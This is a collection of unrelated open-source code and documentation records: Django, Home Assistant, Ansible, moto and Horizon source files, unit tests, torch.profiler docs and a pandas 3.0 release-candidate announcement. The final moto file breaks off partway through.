response = unirest.get("https://api.idolondemand.com/1/api/sync/deletetextindex/v1", headers={"Accept": "application/json"}, params={"index": name, "apikey": apikey})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
confirm = reply['confirm']
print "DELETING INDEX - CONFIRM"
# Now delete the index. Second call with the "confirm" token
response = unirest.get("https://api.idolondemand.com/1/api/sync/deletetextindex/v1", headers={"Accept": "application/json"}, params={"index": name, "apikey": apikey, "confirm": confirm})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
print "DELETING CONNECTOR"
response = unirest.get("https://api.idolondemand.com/1/api/sync/deleteconnector/v1", headers={"Accept": "application/json"}, params={"connector": name, "apikey": apikey})
reply = json.loads(response.raw_body)
pprint.pprint(reply)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
Extra HTML Widget classes
"""
from django.newforms.widgets import Widget, Select
from django.utils.dates import MONTHS
import datetime
__all__ = ('SelectDateWidget',)
class SelectDateWidget(Widget):
"""
A Widget that splits date input into three <select> boxes.
This also serves as an example of a Widget that has more than one HTML
element and hence implements value_from_datadict.
"""
month_field = '%s_month'
day_field = '%s_day'
year_field = '%s_year'
def __init__(self, attrs=None, years=None):
# years is an optional list/tuple of years to use in the "year" select box.
self.attrs = attrs or {}
if years:
self.years = years
else:
this_year = datetime.date.today().year
self.years = range(this_year, this_year+10)
def render(self, name, value, attrs=None):
try:
value = datetime.date(*map(int, value.split('-')))
year_val, month_val, day_val = value.year, value.month, value.day
except (AttributeError, TypeError, ValueError):
year_val = month_val = day_val = None
output = []
month_choices = MONTHS.items()
month_choices.sort()
select_html = Select(choices=month_choices).render(self.month_field % name, month_val)
output.append(select_html)
day_choices = [(i, i) for i in range(1, 32)]
select_html = Select(choices=day_choices).render(self.day_field % name, day_val)
output.append(select_html)
year_choices = [(i, i) for i in self.years]
select_html = Select(choices=year_choices).render(self.year_field % name, year_val)
output.append(select_html)
return u'\n'.join(output)
def value_from_datadict(self, data, name):
y, m, d = data.get(self.year_field % name), data.get(self.month_field % name), data.get(self.day_field % name)
if y and m and d:
return '%s-%s-%s' % (y, m, d)
return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
import unittest
import werks.bus
class TestEventHandler(object):
def __init__(self):
self.triggered = False
self.arg = None
self.kw = None
def callback(self):
self.triggered = True
def cb_arg(self, arg):
self.arg = arg
def cb_kw(self, kw=None):
self.kw = kw
def cb_arg_kw(self, arg, kw=None):
self.arg = arg
self.kw = kw
class EventBusTestCases(unittest.TestCase):
def test_init_eventbus(self):
b = werks.bus.EventBus()
self.assertIsNotNone(b)
def test_add_channel(self):
ch_name = "ch1"
b = werks.bus.EventBus()
b.add_channel(ch_name)
self.assertTrue( ch_name in b.listeners )
self.assertTrue( len(b.listeners[ch_name]) == 0 )
def test_remove_channel(self):
ch_name = "ch1"
b = werks.bus.EventBus()
b.add_channel(ch_name)
b.remove_channel(ch_name)
self.assertTrue( ch_name not in b.listeners )
def test_fail_remove_channel(self):
ch_name = "ch1"
b = werks.bus.EventBus()
cb = TestEventHandler()
b.subscribe(ch_name, cb.callback)
# with self.assertRaises(werks.bus.EventBusException):
# b.remove_channel(ch_name)
def test_subscribe_publish(self):
b = werks.bus.EventBus()
cb = TestEventHandler()
b.subscribe("ch1", cb.callback)
b.publish("ch1")
self.assertTrue(cb.triggered)
def test_unsubscribe(self):
channel_name = "ch1"
b = werks.bus.EventBus()
cb1 = TestEventHandler()
cb2 = TestEventHandler()
b.subscribe(channel_name, cb1.callback)
b.subscribe(channel_name, cb2.callback)
b.unsubscribe(channel_name, cb1.callback)
b.publish(channel_name)
self.assertFalse(cb1.triggered)
self.assertTrue(cb2.triggered)
def test_pub_no_sub(self):
b = werks.bus.EventBus()
b.publish("channel_name")
self.assertTrue(True)
def test_pub_with_arg(self):
channel_name = "ch1"
arg_value = "arg-value"
b = werks.bus.EventBus()
cb = TestEventHandler()
b.subscribe(channel_name, cb.cb_arg)
b.publish(channel_name, arg_value)
self.assertEqual(cb.arg, arg_value)
def test_pub_with_keyword(self):
channel_name = "ch1"
kw_value = "kw-value"
b = werks.bus.EventBus()
cb = TestEventHandler()
b.subscribe(channel_name, cb.cb_kw)
b.publish(channel_name, kw=kw_value)
self.assertEqual(cb.kw, kw_value)
def test_multi_pub_with_kw_and_arg(self):
channel_name = "ch1"
kw_value = "kw-value"
arg_value = "arg-value"
b = werks.bus.EventBus()
cb1 = TestEventHandler()
cb2 = TestEventHandler()
b.subscribe(channel_name, cb1.cb_arg_kw)
b.subscribe(channel_name, cb2.cb_arg_kw)
b.publish(channel_name, arg_value, kw=kw_value)
self.assertEqual(cb1.arg, arg_value)
self.assertEqual(cb2.arg, arg_value)
self.assertEqual(cb1.kw, kw_value)
self.assertEqual(cb2.kw, kw_value)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""The tests for the mFi sensor platform."""
from mficlient.client import FailedToLogin
import pytest
import requests
import homeassistant.components.mfi.sensor as mfi
import homeassistant.components.sensor as sensor_component
from homeassistant.const import TEMP_CELSIUS
from homeassistant.setup import async_setup_component
import tests.async_mock as mock
PLATFORM = mfi
COMPONENT = sensor_component
THING = "sensor"
GOOD_CONFIG = {
"sensor": {
"platform": "mfi",
"host": "foo",
"port": 6123,
"username": "user",
"password": "pass",
"ssl": True,
"verify_ssl": True,
}
}
async def test_setup_missing_config(hass):
"""Test setup with missing configuration."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
config = {"sensor": {"platform": "mfi"}}
assert await async_setup_component(hass, "sensor", config)
assert not mock_client.called
async def test_setup_failed_login(hass):
"""Test setup with login failure."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
mock_client.side_effect = FailedToLogin
assert not PLATFORM.setup_platform(hass, dict(GOOD_CONFIG), None)
async def test_setup_failed_connect(hass):
"""Test setup with connection failure."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
mock_client.side_effect = requests.exceptions.ConnectionError
assert not PLATFORM.setup_platform(hass, dict(GOOD_CONFIG), None)
async def test_setup_minimum(hass):
"""Test setup with minimum configuration."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
config = dict(GOOD_CONFIG)
del config[THING]["port"]
assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
await hass.async_block_till_done()
assert mock_client.call_count == 1
assert mock_client.call_args == mock.call(
"foo", "user", "pass", port=6443, use_tls=True, verify=True
)
async def test_setup_with_port(hass):
"""Test setup with port."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
config = dict(GOOD_CONFIG)
config[THING]["port"] = 6123
assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
await hass.async_block_till_done()
assert mock_client.call_count == 1
assert mock_client.call_args == mock.call(
"foo", "user", "pass", port=6123, use_tls=True, verify=True
)
async def test_setup_with_tls_disabled(hass):
"""Test setup without TLS."""
with mock.patch("homeassistant.components.mfi.sensor.MFiClient") as mock_client:
config = dict(GOOD_CONFIG)
del config[THING]["port"]
config[THING]["ssl"] = False
config[THING]["verify_ssl"] = False
assert await async_setup_component(hass, COMPONENT.DOMAIN, config)
await hass.async_block_till_done()
assert mock_client.call_count == 1
assert mock_client.call_args == mock.call(
"foo", "user", "pass", port=6080, use_tls=False, verify=False
)
async def test_setup_adds_proper_devices(hass):
"""Test if setup adds devices."""
with mock.patch(
"homeassistant.components.mfi.sensor.MFiClient"
) as mock_client, mock.patch(
"homeassistant.components.mfi.sensor.MfiSensor"
) as mock_sensor:
ports = {
i: mock.MagicMock(model=model) for i, model in enumerate(mfi.SENSOR_MODELS)
}
ports["bad"] = mock.MagicMock(model="notasensor")
mock_client.return_value.get_devices.return_value = [
mock.MagicMock(ports=ports)
]
assert await async_setup_component(hass, COMPONENT.DOMAIN, GOOD_CONFIG)
await hass.async_block_till_done()
for ident, port in ports.items():
if ident != "bad":
mock_sensor.assert_any_call(port, hass)
assert mock.call(ports["bad"], hass) not in mock_sensor.mock_calls
@pytest.fixture(name="port")
def port_fixture():
"""Port fixture."""
return mock.MagicMock()
@pytest.fixture(name="sensor")
def sensor_fixture(hass, port):
"""Sensor fixture."""
return mfi.MfiSensor(port, hass)
async def test_name(port, sensor):
"""Test the name."""
assert port.label == sensor.name
async def test_uom_temp(port, sensor):
"""Test the UOM temperature."""
port.tag = "temperature"
assert TEMP_CELSIUS == sensor.unit_of_measurement
async def test_uom_power(port, sensor):
"""Test the UOEM power."""
port.tag = "active_pwr"
assert sensor.unit_of_measurement == "Watts"
async def test_uom_digital(port, sensor):
"""Test the UOM digital input."""
port.model = "Input Digital"
assert sensor.unit_of_measurement == "State"
async def test_uom_unknown(port, sensor):
"""Test the UOM."""
port.tag = "balloons"
assert sensor.unit_of_measurement == "balloons"
async def test_uom_uninitialized(port, sensor):
"""Test that the UOM defaults if not initialized."""
type(port).tag = mock.PropertyMock(side_effect=ValueError)
assert sensor.unit_of_measurement == "State"
async def test_state_digital(port, sensor):
"""Test the digital input."""
port.model = "Input Digital"
port.value = 0
assert mfi.STATE_OFF == sensor.state
port.value = 1
assert mfi.STATE_ON == sensor.state
port.value = 2
assert mfi.STATE_ON == sensor.state
async def test_state_digits(port, sensor):
"""Test the state of digits."""
port.tag = "didyoucheckthedict?"
port.value = 1.25
with mock.patch.dict(mfi.DIGITS, {"didyoucheckthedict?": 1}):
assert sensor.state == 1.2
with mock.patch.dict(mfi.DIGITS, {}):
assert sensor.state == 1.0
async def test_state_uninitialized(port, sensor):
"""Test the state of uninitialized sensorfs."""
type(port).tag = mock.PropertyMock(side_effect=ValueError)
assert mfi.STATE_OFF == sensor.state
async def test_update(port, sensor):
"""Test the update."""
sensor.update()
assert port.refresh.call_count == 1
assert port.refresh.call_args == mock.call()
|
unknown
|
codeparrot/codeparrot-clean
| ||
__all__ = ('override_settings',)
try:
from django.test.utils import override_settings
except ImportError:
# we are in Django 1.3
from django.conf import settings, UserSettingsHolder
from django.utils.functional import wraps
class override_settings(object):
"""
Acts as either a decorator, or a context manager. If it's a decorator
it takes a function and returns a wrapped function. If it's a
contextmanager it's used with the ``with`` statement. In either event
entering/exiting are called before and after, respectively,
the function/block is executed.
This class was backported from Django 1.5
As django.test.signals.setting_changed is not supported in 1.3,
it's not sent on changing settings.
"""
def __init__(self, **kwargs):
self.options = kwargs
self.wrapped = settings._wrapped
def __enter__(self):
self.enable()
def __exit__(self, exc_type, exc_value, traceback):
self.disable()
def __call__(self, test_func):
from django.test import TransactionTestCase
if isinstance(test_func, type):
if not issubclass(test_func, TransactionTestCase):
raise Exception(
"Only subclasses of Django SimpleTestCase "
"can be decorated with override_settings")
original_pre_setup = test_func._pre_setup
original_post_teardown = test_func._post_teardown
def _pre_setup(innerself):
self.enable()
original_pre_setup(innerself)
def _post_teardown(innerself):
original_post_teardown(innerself)
self.disable()
test_func._pre_setup = _pre_setup
test_func._post_teardown = _post_teardown
return test_func
else:
@wraps(test_func)
def inner(*args, **kwargs):
with self:
return test_func(*args, **kwargs)
return inner
def enable(self):
override = UserSettingsHolder(settings._wrapped)
for key, new_value in self.options.items():
setattr(override, key, new_value)
settings._wrapped = override
def disable(self):
settings._wrapped = self.wrapped
|
unknown
|
codeparrot/codeparrot-clean
| ||
Title: pandas 3.0.0 release candidate ready for testing!
Date: 2025-12-12
# pandas 3.0.0 release candidate ready for testing!
We're excited to announce the release candidate for pandas 3.0. This major
release brings significant improvements to pandas, but also features some
potentially breaking changes.
To ensure a smooth pandas 3.0 release, we can use your help to [test the
release candidate now](#call-to-action-test-the-release-candidate).
## Highlights of pandas 3.0
pandas 3.0 introduces several major enhancements:
- **Dedicated string data type by default**: string columns are now inferred as
the new `str` dtype instead of `object`, providing better performance and type
safety
- **Consistent copy/view behaviour with Copy-on-Write (CoW)** (a.k.a. getting
rid of the SettingWithCopyWarning): more predictable and consistent behavior
for all operations, with improved performance through avoiding unnecessary
copies
- **New `pd.col` syntax**: initial support for `pd.col()` as a simplified syntax
for creating callables in `DataFrame.assign`
Further, pandas 3.0 includes a lot of other improvements and bug fixes. You can
find the complete list of changes in our
[release notes](https://pandas.pydata.org/docs/dev/whatsnew/v3.0.0.html).
## Important changes requiring code updates
As a major release, pandas 3.0 includes some breaking changes that may require
updates to your code. The two most significant changes are:
### 1. Dedicated string data type by default
Starting with pandas 3.0, string columns are automatically inferred as `str`
dtype instead of the numpy `object` (which can store any Python object).
**Example:**
```python
# Old behavior (pandas < 3.0)
>>> ser = pd.Series(["a", "b"])
>>> ser
0 a
1 b
dtype: object # <-- numpy object dtype
# New behavior (pandas 3.0)
>>> ser = pd.Series(["a", "b"])
>>> ser.dtype
>>> ser
0 a
1 b
dtype: str # <-- new string dtype
```
This change improves performance and type safety, but may require code updates,
especially for library code that currently looks for "object" dtype when
expecting string data.
For more details, see the
[migration guide for the new string data type](https://pandas.pydata.org/docs/dev/user_guide/migration-3-strings.html).
### 2. Consistent copy/view behaviour with Copy-on-Write (CoW)
Copy-on-Write is now the default and only mode in pandas 3.0. This makes
behavior more consistent and predictable, but requires updates to certain coding
patterns.
The most impactfull change is that **chained assignment will no longer work**.
As a result, the `SettingWithCopyWarning` is also removed (since there is no
longer ambiguity whether it would work or not), and defensive `.copy()` calls
to silence the warning are no longer needed.
**Example:**
```python
# Old behavior (pandas < 3.0) - chained assignment
df["foo"][df["bar"] > 5] = # This might modify df (unpredictable)
# New behavior (pandas 3.0) - must do the modification in one step (e.g. with .loc)
df.loc[df["bar"] > 5, "foo"] = 100
```
In general, any result of an indexing operation or method now always behaves as
if it were a copy, so modifications of the result won't affect the original
DataFrame.
For more details, see the
[Copy-on-Write migration guide](https://pandas.pydata.org/docs/dev/user_guide/copy_on_write.html#migrating-to-copy-on-write).
## Call to Action: test the Release Candidate
We need your help to ensure a smooth pandas 3.0 release!
Especially if you have pandas code in production or maintain a library with
pandas as a dependency, it is strongly recommended to run your test suites with
the release candidate, and report any issue to our issue tracker before the
official 3.0.0 release.
How can you best test the release candidate?
1. **First update to the latest released pandas 2.3** (if you are not already
running that version) and test it with your codebase. It is recommended to
resolve any deprecation warning before upgrading to pandas 3.0.
2. Optionally, you can already enable the new string dtype and Copy-on-Write
mode using pandas 2.3 (`pd.options.future.infer_string = True` and
`pd.options.mode.copy_on_write = True`).
3. **Install the release candidate** (see below) and test it with your codebase
4. **Run your existing code** to identify any issues or needed updates
5. **Report any problems** you encounter on our [GitHub repository issue tracker](https://github.com/pandas-dev/pandas/issues)
The more testing we get now, the smoother the final pandas 3.0 release will be
for everyone. Your feedback is crucial for making this a successful release!
### Getting the Release Candidate
You can install the latest pandas 3.0 release candidate from PyPI:
```bash
python -m pip install --upgrade --pre pandas==3.*
```
Or from conda-forge using conda/mamba:
```bash
conda install -c conda-forge/label/pandas_rc pandas=3
```
|
unknown
|
github
|
https://github.com/pandas-dev/pandas
|
web/pandas/community/blog/pandas-3.0-release-candidate.md
|
from django.db.models.sql import compiler
class SQLCompiler(compiler.SQLCompiler):
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Creates the SQL for this query. Returns the SQL string and list
of parameters. This is overridden from the original Query class
to handle the additional SQL Oracle requires to emulate LIMIT
and OFFSET.
If 'with_limits' is False, any limit/offset information is not
included in the query.
"""
# The `do_offset` flag indicates whether we need to construct
# the SQL needed to use limit/offset with Oracle.
do_offset = with_limits and (self.query.high_mark is not None or self.query.low_mark)
if not do_offset:
sql, params = super().as_sql(with_limits=False, with_col_aliases=with_col_aliases)
else:
sql, params = super().as_sql(with_limits=False, with_col_aliases=True)
# Wrap the base query in an outer SELECT * with boundaries on
# the "_RN" column. This is the canonical way to emulate LIMIT
# and OFFSET on Oracle.
high_where = ''
if self.query.high_mark is not None:
high_where = 'WHERE ROWNUM <= %d' % (self.query.high_mark,)
if self.query.low_mark:
sql = (
'SELECT * FROM (SELECT "_SUB".*, ROWNUM AS "_RN" FROM (%s) '
'"_SUB" %s) WHERE "_RN" > %d' % (sql, high_where, self.query.low_mark)
)
else:
# Simplify the query to support subqueries if there's no offset.
sql = (
'SELECT * FROM (SELECT "_SUB".* FROM (%s) "_SUB" %s)' % (sql, high_where)
)
return sql, params
class SQLInsertCompiler(compiler.SQLInsertCompiler, SQLCompiler):
pass
class SQLDeleteCompiler(compiler.SQLDeleteCompiler, SQLCompiler):
pass
class SQLUpdateCompiler(compiler.SQLUpdateCompiler, SQLCompiler):
pass
class SQLAggregateCompiler(compiler.SQLAggregateCompiler, SQLCompiler):
pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
```{eval-rst}
.. currentmodule:: torch.profiler
```
# torch.profiler
## Overview
```{eval-rst}
.. automodule:: torch.profiler
```
## API Reference
```{eval-rst}
.. autoclass:: torch.profiler._KinetoProfile
:members:
.. autoclass:: torch.profiler.profile
:members:
.. autoclass:: torch.profiler.ProfilerAction
:members:
.. autoclass:: torch.profiler.ProfilerActivity
:members:
.. autofunction:: torch.profiler.schedule
.. autofunction:: torch.profiler.tensorboard_trace_handler
```
## Intel Instrumentation and Tracing Technology APIs
```{eval-rst}
.. autofunction:: torch.profiler.itt.is_available
.. autofunction:: torch.profiler.itt.mark
.. autofunction:: torch.profiler.itt.range_push
.. autofunction:: torch.profiler.itt.range_pop
```
<!-- This module needs to be documented. Adding here in the meantime
for tracking purposes -->
```{eval-rst}
.. py:module:: torch.profiler.itt
.. py:module:: torch.profiler.profiler
.. py:module:: torch.profiler.python_tracer
```
|
unknown
|
github
|
https://github.com/pytorch/pytorch
|
docs/source/profiler.md
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.api import neutron
from openstack_dashboard.dashboards.project import dashboard
LOG = logging.getLogger(__name__)
class LoadBalancer(horizon.Panel):
name = _("Load Balancers")
slug = "loadbalancers"
permissions = ('openstack.services.network',)
def allowed(self, context):
request = context['request']
if not request.user.has_perms(self.permissions):
return False
try:
if not neutron.is_service_enabled(request,
config_name='enable_lb',
ext_name='lbaas'):
return False
except Exception:
LOG.error("Call to list enabled services failed. This is likely "
"due to a problem communicating with the Neutron "
"endpoint. Load Balancers panel will not be displayed.")
return False
if not super(LoadBalancer, self).allowed(context):
return False
return True
dashboard.Project.register(LoadBalancer)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# (c) 2013, Paul Durivage <paul.durivage@rackspace.com>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# This is a DOCUMENTATION stub specific to this module, it extends
# a documentation fragment located in ansible.utils.module_docs_fragments
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: rax_files
short_description: Manipulate Rackspace Cloud Files Containers
description:
- Manipulate Rackspace Cloud Files Containers
version_added: "1.5"
options:
clear_meta:
description:
- Optionally clear existing metadata when applying metadata to existing containers.
Selecting this option is only appropriate when setting type=meta
choices:
- "yes"
- "no"
default: "no"
container:
description:
- The container to use for container or metadata operations.
required: true
meta:
description:
- A hash of items to set as metadata values on a container
private:
description:
- Used to set a container as private, removing it from the CDN. B(Warning!)
Private containers, if previously made public, can have live objects
available until the TTL on cached objects expires
public:
description:
- Used to set a container as public, available via the Cloud Files CDN
region:
description:
- Region to create an instance in
default: DFW
state:
description:
- Indicate desired state of the resource
choices: ['present', 'absent']
default: present
ttl:
description:
- In seconds, set a container-wide TTL for all objects cached on CDN edge nodes.
Setting a TTL is only appropriate for containers that are public
type:
description:
- Type of object to do work on, i.e. metadata object or a container object
choices:
- file
- meta
default: file
web_error:
description:
- Sets an object to be presented as the HTTP error page when accessed by the CDN URL
web_index:
description:
- Sets an object to be presented as the HTTP index page when accessed by the CDN URL
author: "Paul Durivage (@angstwad)"
extends_documentation_fragment: rackspace
'''
EXAMPLES = '''
- name: "Test Cloud Files Containers"
hosts: local
gather_facts: no
tasks:
- name: "List all containers"
rax_files:
state: list
- name: "Create container called 'mycontainer'"
rax_files:
container: mycontainer
- name: "Create container 'mycontainer2' with metadata"
rax_files:
container: mycontainer2
meta:
key: value
file_for: someuser@example.com
- name: "Set a container's web index page"
rax_files:
container: mycontainer
web_index: index.html
- name: "Set a container's web error page"
rax_files:
container: mycontainer
web_error: error.html
- name: "Make container public"
rax_files:
container: mycontainer
public: yes
- name: "Make container public with a 24 hour TTL"
rax_files:
container: mycontainer
public: yes
ttl: 86400
- name: "Make container private"
rax_files:
container: mycontainer
private: yes
- name: "Test Cloud Files Containers Metadata Storage"
hosts: local
gather_facts: no
tasks:
- name: "Get mycontainer2 metadata"
rax_files:
container: mycontainer2
type: meta
- name: "Set mycontainer2 metadata"
rax_files:
container: mycontainer2
type: meta
meta:
uploaded_by: someuser@example.com
- name: "Remove mycontainer2 metadata"
rax_files:
container: "mycontainer2"
type: meta
state: absent
meta:
key: ""
file_for: ""
'''
try:
import pyrax
HAS_PYRAX = True
except ImportError as e:
HAS_PYRAX = False
EXIT_DICT = dict(success=True)
META_PREFIX = 'x-container-meta-'
def _get_container(module, cf, container):
try:
return cf.get_container(container)
except pyrax.exc.NoSuchContainer as e:
module.fail_json(msg=e.message)
def _fetch_meta(module, container):
EXIT_DICT['meta'] = dict()
try:
for k, v in container.get_metadata().items():
split_key = k.split(META_PREFIX)[-1]
EXIT_DICT['meta'][split_key] = v
except Exception as e:
module.fail_json(msg=e.message)
def meta(cf, module, container_, state, meta_, clear_meta):
c = _get_container(module, cf, container_)
if meta_ and state == 'present':
try:
meta_set = c.set_metadata(meta_, clear=clear_meta)
except Exception as e:
module.fail_json(msg=e.message)
elif meta_ and state == 'absent':
remove_results = []
for k, v in meta_.items():
c.remove_metadata_key(k)
remove_results.append(k)
EXIT_DICT['deleted_meta_keys'] = remove_results
elif state == 'absent':
remove_results = []
for k, v in c.get_metadata().items():
c.remove_metadata_key(k)
remove_results.append(k)
EXIT_DICT['deleted_meta_keys'] = remove_results
_fetch_meta(module, c)
_locals = locals().keys()
EXIT_DICT['container'] = c.name
if 'meta_set' in _locals or 'remove_results' in _locals:
EXIT_DICT['changed'] = True
module.exit_json(**EXIT_DICT)
def container(cf, module, container_, state, meta_, clear_meta, ttl, public,
private, web_index, web_error):
if public and private:
module.fail_json(msg='container cannot be simultaneously '
'set to public and private')
if state == 'absent' and (meta_ or clear_meta or public or private or web_index or web_error):
module.fail_json(msg='state cannot be omitted when setting/removing '
'attributes on a container')
if state == 'list':
# We don't care if attributes are specified, let's list containers
EXIT_DICT['containers'] = cf.list_containers()
module.exit_json(**EXIT_DICT)
try:
c = cf.get_container(container_)
except pyrax.exc.NoSuchContainer as e:
# Make the container if state=present, otherwise bomb out
if state == 'present':
try:
c = cf.create_container(container_)
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['changed'] = True
EXIT_DICT['created'] = True
else:
module.fail_json(msg=e.message)
else:
# Successfully grabbed a container object
# Delete if state is absent
if state == 'absent':
try:
cont_deleted = c.delete()
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['deleted'] = True
if meta_:
try:
meta_set = c.set_metadata(meta_, clear=clear_meta)
except Exception as e:
module.fail_json(msg=e.message)
finally:
_fetch_meta(module, c)
if ttl:
try:
c.cdn_ttl = ttl
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['ttl'] = c.cdn_ttl
if public:
try:
cont_public = c.make_public()
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['container_urls'] = dict(url=c.cdn_uri,
ssl_url=c.cdn_ssl_uri,
streaming_url=c.cdn_streaming_uri,
ios_uri=c.cdn_ios_uri)
if private:
try:
cont_private = c.make_private()
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['set_private'] = True
if web_index:
try:
cont_web_index = c.set_web_index_page(web_index)
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['set_index'] = True
finally:
_fetch_meta(module, c)
if web_error:
try:
cont_err_index = c.set_web_error_page(web_error)
except Exception as e:
module.fail_json(msg=e.message)
else:
EXIT_DICT['set_error'] = True
finally:
_fetch_meta(module, c)
EXIT_DICT['container'] = c.name
EXIT_DICT['objs_in_container'] = c.object_count
EXIT_DICT['total_bytes'] = c.total_bytes
_locals = locals().keys()
if ('cont_deleted' in _locals
or 'meta_set' in _locals
or 'cont_public' in _locals
or 'cont_private' in _locals
or 'cont_web_index' in _locals
or 'cont_err_index' in _locals):
EXIT_DICT['changed'] = True
module.exit_json(**EXIT_DICT)
def cloudfiles(module, container_, state, meta_, clear_meta, typ, ttl, public,
private, web_index, web_error):
""" Dispatch from here to work with metadata or file objects """
cf = pyrax.cloudfiles
if cf is None:
module.fail_json(msg='Failed to instantiate client. This '
'typically indicates an invalid region or an '
'incorrectly capitalized region name.')
if typ == "container":
container(cf, module, container_, state, meta_, clear_meta, ttl,
public, private, web_index, web_error)
else:
meta(cf, module, container_, state, meta_, clear_meta)
def main():
argument_spec = rax_argument_spec()
argument_spec.update(
dict(
container=dict(),
state=dict(choices=['present', 'absent', 'list'],
default='present'),
meta=dict(type='dict', default=dict()),
clear_meta=dict(default=False, type='bool'),
type=dict(choices=['container', 'meta'], default='container'),
ttl=dict(type='int'),
public=dict(default=False, type='bool'),
private=dict(default=False, type='bool'),
web_index=dict(),
web_error=dict()
)
)
module = AnsibleModule(
argument_spec=argument_spec,
required_together=rax_required_together()
)
if not HAS_PYRAX:
module.fail_json(msg='pyrax is required for this module')
container_ = module.params.get('container')
state = module.params.get('state')
meta_ = module.params.get('meta')
clear_meta = module.params.get('clear_meta')
typ = module.params.get('type')
ttl = module.params.get('ttl')
public = module.params.get('public')
private = module.params.get('private')
web_index = module.params.get('web_index')
web_error = module.params.get('web_error')
if state in ['present', 'absent'] and not container_:
module.fail_json(msg='please specify a container name')
if clear_meta and not typ == 'meta':
module.fail_json(msg='clear_meta can only be used when setting '
'metadata')
setup_rax_module(module, pyrax)
cloudfiles(module, container_, state, meta_, clear_meta, typ, ttl, public,
private, web_index, web_error)
from ansible.module_utils.basic import *
from ansible.module_utils.rax import *
if __name__ == '__main__':
main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
DOCUMENTATION:
name: config
|
unknown
|
github
|
https://github.com/ansible/ansible
|
lib/ansible/_internal/ansible_collections/ansible/_protomatter/plugins/lookup/config.yml
|
import re
import string
from datetime import datetime
import random
from uuid import uuid4
from boto3 import Session
from moto.core import BaseBackend, BaseModel, ACCOUNT_ID
from moto.core.utils import unix_time
from moto.organizations import organizations_backends
from moto.ram.exceptions import (
MalformedArnException,
InvalidParameterException,
UnknownResourceException,
OperationNotPermittedException,
)
def random_resource_id(size):
return "".join(random.choice(string.digits + "abcdef") for _ in range(size))
class ResourceShare(BaseModel):
# List of shareable resources can be found here
# https://docs.aws.amazon.com/ram/latest/userguide/shareable.html
SHAREABLE_RESOURCES = [
"cluster", # Amazon Aurora cluster
"component", # Amazon EC2 Image Builder component
"group", # AWS Resource Groups
"image", # Amazon EC2 Image Builder image
"image-recipe", # Amazon EC2 Image Builder image recipe
"license-configuration", # AWS License Manager configuration
"mesh", # AWS App Mesh
"prefix-list", # Amazon EC2 prefix list
"project", # AWS CodeBuild project
"report-group", # AWS CodeBuild report group
"resolver-rule", # Amazon Route 53 forwarding rule
"subnet", # Amazon EC2 subnet
"transit-gateway", # Amazon EC2 transit gateway
]
def __init__(self, region, **kwargs):
self.region = region
self.allow_external_principals = kwargs.get("allowExternalPrincipals", True)
self.arn = "arn:aws:ram:{0}:{1}:resource-share/{2}".format(
self.region, ACCOUNT_ID, uuid4()
)
self.creation_time = datetime.utcnow()
self.feature_set = "STANDARD"
self.last_updated_time = datetime.utcnow()
self.name = kwargs["name"]
self.owning_account_id = ACCOUNT_ID
self.principals = []
self.resource_arns = []
self.status = "ACTIVE"
@property
def organizations_backend(self):
return organizations_backends["global"]
def add_principals(self, principals):
for principal in principals:
match = re.search(
r"^arn:aws:organizations::\d{12}:organization/(o-\w+)$", principal
)
if match:
organization = self.organizations_backend.describe_organization()
if principal == organization["Organization"]["Arn"]:
continue
else:
raise UnknownResourceException(
"Organization {} could not be found.".format(match.group(1))
)
match = re.search(
r"^arn:aws:organizations::\d{12}:ou/(o-\w+)/(ou-[\w-]+)$", principal
)
if match:
roots = self.organizations_backend.list_roots()
root_id = next(
(
root["Id"]
for root in roots["Roots"]
if root["Name"] == "Root" and match.group(1) in root["Arn"]
),
None,
)
if root_id:
ous = self.organizations_backend.list_organizational_units_for_parent(
ParentId=root_id
)
if any(principal == ou["Arn"] for ou in ous["OrganizationalUnits"]):
continue
raise UnknownResourceException(
"OrganizationalUnit {} in unknown organization could not be found.".format(
match.group(2)
)
)
if not re.match(r"^\d{12}$", principal):
raise InvalidParameterException(
"Principal ID {} is malformed. "
"Verify the ID and try again.".format(principal)
)
for principal in principals:
self.principals.append(principal)
def add_resources(self, resource_arns):
for resource in resource_arns:
match = re.search(
r"^arn:aws:[a-z0-9-]+:[a-z0-9-]*:[0-9]{12}:([a-z-]+)[/:].*$", resource
)
if not match:
